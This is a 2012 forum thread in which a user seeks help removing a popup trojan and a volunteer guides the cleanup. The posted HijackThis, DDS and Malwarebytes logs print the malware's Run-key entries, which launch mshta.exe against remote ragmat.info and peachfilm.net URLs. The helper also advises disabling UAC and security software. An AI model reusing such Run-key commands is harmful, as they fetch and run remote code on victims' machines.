Advertisement

There's no such thing as a stupid question, but they're the easiest to answer.
Login
Search

Advertisement

Virus & Other Malware Removal Virus & Other Malware Removal
Search Search
Search for:
Tech Support Guy > > >

Solved: mshta.exe japenese porn popup


(!)

gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
23-May-2012, 04:34 PM #1
mshta.exe japenese porn popup
I an constantly getting a pop up from a japanese porn site and the process it uses is MSHTA.exe. if i kill the process it pops up again after 15 or so mins. I have included my hijackthis log below also i ran process explorer on mshta and the command line under image is

C:\Windows\system32\mshta.exe http://ragmat.info/reg2.php?cccid=ir...u6qNCcCsJqkMCP


Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:14:56 PM, on 5/23/2012
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.19222)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\TeamViewer\Version6\TeamViewer.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\DAEMON Tools Lite\daemon.exe
C:\Windows\system32\mshta.exe
C:\Users\GAGAN\Downloads\HijackThis.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.toshibadirect.com/dpdstart
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.imesh.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://us.rd.yahoo.com/customize/ie/.../www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ie/...ch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.com/customize/ie/.../www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.sweetim.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O1 - Hosts: ::1 localhost
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin .dll
O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Oracle\JavaFX 2.0 Runtime\bin\jp2ssv.dll
O2 - BHO: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O3 - Toolbar: Veoh Browser Plug-in - {D0943516-5076-4020-A3B5-AEFAF26AB263} - C:\Program Files\Veoh Networks\Veoh\Plugins\reg\VeohToolbar.dll
O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
O3 - Toolbar: Veoh Web Player Video Finder - {0FBB9689-D3D7-4f7a-A2E2-585B10099BFC} - C:\Program Files\Veoh Networks\VeohWebPlayer\VeohIEToolbar.dll
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O3 - Toolbar: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [Skytel] Skytel.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [TkBellExe] "c:\program files\real\realplayer\Update\realsched.exe" -osboot
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [Google Update] "C:\Users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\daemon.exe"
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/reg2.php?cccid=ir...CsJqkMCP&log=1
O4 - HKCU\..\Run: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?ccci...u6qNCcCsJqkMCP
O4 - HKCU\..\RunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?ccci...u6qNCcCsJqkMCP
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'Default user')
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
O18 - Protocol: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systems - C:\Windows\system32\agrsmsvc.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Ati External Event Utility - ATI Technologies Inc. - C:\Windows\system32\Ati2evxx.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: McAfee SiteAdvisor Service - McAfee, Inc. - c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
O23 - Service: TeamViewer 6 (TeamViewer6) - TeamViewer GmbH - C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
O23 - Service: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - TOSHIBA Corporation - C:\Windows\system32\TODDSrv.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

--
End of file - 9444 bytes

Please help drving me nuts not keen on reformatting
Mark1956's Avatar
Malware Removal Specialist with 14,074 posts.
 
Join Date: May 2011
Location: Spain
Experience: Advanced
25-May-2012, 05:25 AM #2
Hi Gagraptor and welcome to TSG, my name is Mark and I will be helping you.

At the top of the Malware forum there is a notice Everyone MUST read this BEFORE posting for help in this forum.

As you have not followed that instruction this may be why you have not received a reply. Please go Here, follow ALL the instructions and post the logs that are requested.

DO NOT make any attempt to delete mshta.exe as it is a legitimate system file.

I would also like you to do the following and post the logs, as follows:
Put the logs into seperate posts if it makes it easier.

STEP 1
Run HijackThis, and press "Scan." When the scan is complete place a check mark next to the following entries (if they are still present): (Please be careful and do not check any other boxes)
NOTE For Windows 7 and Vista you must turn off the User Account Control to allow HJT to run correctly.
For Vista, click on Start and type User Accounts in the search box and hit Enter, click on Turn User Account Control on or off, uncheck the box to turn off UAC. For Windows 7 click on Start and type UAC in the box and hit Enter, then move the slider all the way to the bottom and click on ok. This action is not required for Windows XP.

O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)

After checking these items CLOSE ALL open windows except HijackThis and click "Fix Checked" to remove the entries you checked. A box will pop up asking you if you wish to fix the selected items. Please choose YES. Once it has fixed them, close HijackThis.
If you receive an error message that indicates HJT cannot remove the entries please try disabling your security software.How to disable your security software
If after disabling your security software there is still a problem, this could be due to the Malware on your system.
Please confirm if the fix runs without a problem. If there is a problem tell me what has happened and post the details of any error messages.
Follow this by opening HJT, go to the Main Menu and Click on "Do a system scan and save logfile." When the log pops up in Notepad, copy and paste that file back here in your next reply.


STEP 2




Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Important!! When you save the mbam-setup file, rename it to something random (such as 123abc.exe) before beginning the download.
  • Double-click on the renamed file to install, then follow these instructions for doing a Quick Scan in normal mode.
  • Don't forget to check for database definition updates through the program's interface (preferable method) before scanning.
  • If you cannot update Malwarebytes or use the Internet to download any files to the infected computer, manually update the database by following the instructions in FAQ Section A: 4. Issues.
Malwarebytes may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
  • Double click on the Malwarebytes icon on your desktop to launch the program
  • Under the Scanner tab, make sure the Perform Quick Scan option is selected.
  • Click on the Scan button.
  • When finished, a message box will say "The scan completed successfully. Click Show Results to display all objects found".
  • Click OK to close the message box, then click the Show Results button to see a list of any malware that was found.
  • Make sure that everything is checked and then click Remove Selected.
  • When removal is completed, a log report will open in Notepad.
  • The log is automatically saved and can be viewed by clicking the Logs tab.
  • Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows the database version and your operating system.
  • Exit Malwarebytes when done.
If Malwarebytes encounters a file that is difficult to remove, you will be asked to reboot your computer so it can proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot normally will prevent Malwarebytes from removing all the malware.

Note: A 14-day trial of Malwarebytes Anti-Malware PRO is available as an option when first installing the free version so all users can test the real-time protection component for a period of two weeks. When the limited time period expires those features will be deactivated and locked. Enabling the Protection Module feature again requires registration and purchase of a license key that includes free lifetime upgrades and support. If you continue to use the free version, there is no requirement to buy a license...you can just use it as a stand-alone scanner.
NOTE: Some types of malware will target Malwarebytes and other security tools to keep them from running properly. If that's the case, use Malwarebytes Chameleon and follow the onscreen instructions. The Chameleon folder can be accessed by opening the program folder for Malwarebytes Anti-Malware (normally C:\Program Files\Malwarebytes' Anti-Malware or C:\Program Files (x86)\Malwarebytes' Anti-Malware).

Last edited by Mark1956; 25-May-2012 at 05:45 AM..
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
28-May-2012, 04:26 AM #3
I am sorry i forgot to add other logs. I have followed your instructions, i already had malwarebytes when i run it i get 3 trojans and i'm asked to restart after restarting when i run malwarebytes again i get the same 3 viruses. i am not able to run able to run gmer as my system freezes.
i'm including all the other logs. PS i also a virtual drive emulation s/w but cant find it to uninstall.
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
28-May-2012, 04:27 AM #4
Malwarebytes Anti-Malware 1.61.0.1400
www.malwarebytes.org

Database version: v2012.05.28.01

Windows Vista Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.19222
GAGAN :: GAGAN-PC [administrator]

5/28/2012 1:28:46 AM
mbam-log-2012-05-28 (01-28-46).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 204053
Time elapsed: 11 minute(s), 4 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 3
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|SystemBootirfzXJvu2w6rbS 0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/reg2.php?cccid=...CsJqkMCP&log=1 -> Quarantined and deleted successfully.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|RegWriteirfzXJvu2w6rbS0H T6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cc...u6qNCcCsJqkMCP -> Quarantined and deleted successfully.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|RegWriteirfzXJvu2w6r bS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cc...u6qNCcCsJqkMCP -> Quarantined and deleted successfully.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
28-May-2012, 04:28 AM #5
.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 8.0.6001.19222 BrowserJavaVersion: 10.3.1
Run by GAGAN at 3:16:57 on 2012-05-28
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.1043 [GMT -4:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Microsoft Security Essentials *Enabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\Ati2evxx.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\agrsmsvc.exe
C:\Windows\system32\svchost.exe -k apphost
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\rundll32.exe
C:\Windows\System32\tcpsvcs.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
C:\Windows\system32\TODDSrv.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Windows\system32\svchost.exe -k iissvcs
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\System32\alg.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\DivX\DivX Update\DivXUpdate.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\DAEMON Tools Lite\daemon.exe
C:\Program Files\Synaptics\SynTP\SynToshiba.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\taskeng.exe
C:\Windows\system32\mshta.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\system32\rundll32.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
c:\PROGRA~1\mcafee\SITEAD~1\saui.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://search.imesh.com/
uDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
mStart Page = hxxp://home.sweetim.com
mDefault_Page_URL = hxxp://www.yahoo.com/
mDefault_Search_URL = hxxp://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
mSearch Page = hxxp://us.rd.yahoo.com/customize/ie/defaults/sp/msgr8/*http://www.yahoo.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
mSearchAssistant =
uURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: H - No File
BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelper.dll
BHO: Skype add-on (mastermind): {22bf413b-c6d2-4d91-82a9-a0f997ba588c} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\programdata\real\realplayer\browserrecordplugin\ie\rpbrowserrecordplugin .dll
BHO: DivX Plus Web Player HTML5 <video>: {326e768d-4182-46fd-9c16-1449a49795f4} - c:\program files\divx\divx plus web player\ie\divxhtml5\DivXHTML5.dll
BHO: Windows Live ID Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\oracle\javafx 2.0 runtime\bin\jp2ssv.dll
BHO: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: Veoh Browser Plug-in: {d0943516-5076-4020-a3b5-aefaf26ab263} - c:\program files\veoh networks\veoh\plugins\reg\VeohToolbar.dll
TB: Veoh Web Player Video Finder: {0fbb9689-d3d7-4f7a-a2e2-585b10099bfc} - c:\program files\veoh networks\veohwebplayer\VeohIEToolbar.dll
TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
TB: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: {EEE6C35B-6118-11DC-9C72-001320C79847} - No File
TB: {A057A204-BACC-4D26-9990-79A187E2698E} - No File
TB: {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [<NO NAME>]
uRun: [Google Update] "c:\users\gagan\appdata\local\google\update\GoogleUpdate.exe" /c
uRun: [DAEMON Tools Lite] "c:\program files\daemon tools lite\daemon.exe"
uRun: [Yahoo! Pager] "c:\progra~1\yahoo!\messen~1\YAHOOM~1.EXE" -quiet
uRun: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/reg2.php?cccid=...CsJqkMCP&log=1
uRun: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cc...u6qNCcCsJqkMCP
uRunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cc...u6qNCcCsJqkMCP
mRun: [RtHDVCpl] RtHDVCpl.exe
mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
mRun: [Skytel] Skytel.exe
mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 8.0\reader\Reader_sl.exe"
mRun: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
mRun: [SynTPEnh] c:\program files\synaptics\syntp\SynTPEnh.exe
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [TkBellExe] "c:\program files\real\realplayer\update\realsched.exe" -osboot
mRun: [DivXUpdate] "c:\program files\divx\divx update\DivXUpdate.exe" /CHECKNOW
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
dRun: [Picasa Media Detector] c:\program files\picasa2\PicasaMediaDetector.exe
mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
mPolicies-system: EnableLinkedConnections = 1 (0x1)
IE: {77BF5300-1474-4EC7-9980-D32B190E9B07} - {77BF5300-1474-4EC7-9980-D32B190E9B07} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
LSP: c:\windows\system32\wpclsp.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
TCP: DhcpNameServer = 192.168.1.1
TCP: Interfaces\{AA0BA040-CE6A-4F94-8BD1-7AFDC60B8156} : DhcpNameServer = 192.168.1.1
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\gagan\appdata\roaming\mozilla\firefox\profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - component: c:\program files\mcafee\siteadvisor\components\McFFPlg.dll
FF - plugin: c:\program files\divx\divx ovs helper\npovshelper.dll
FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
FF - plugin: c:\program files\mcafee\siteadvisor\NPMcFFPlg32.dll
FF - plugin: c:\program files\microsoft silverlight\4.1.10329.0\npctrlui.dll
FF - plugin: c:\program files\mozilla firefox\plugins\npPandoWebInst.dll
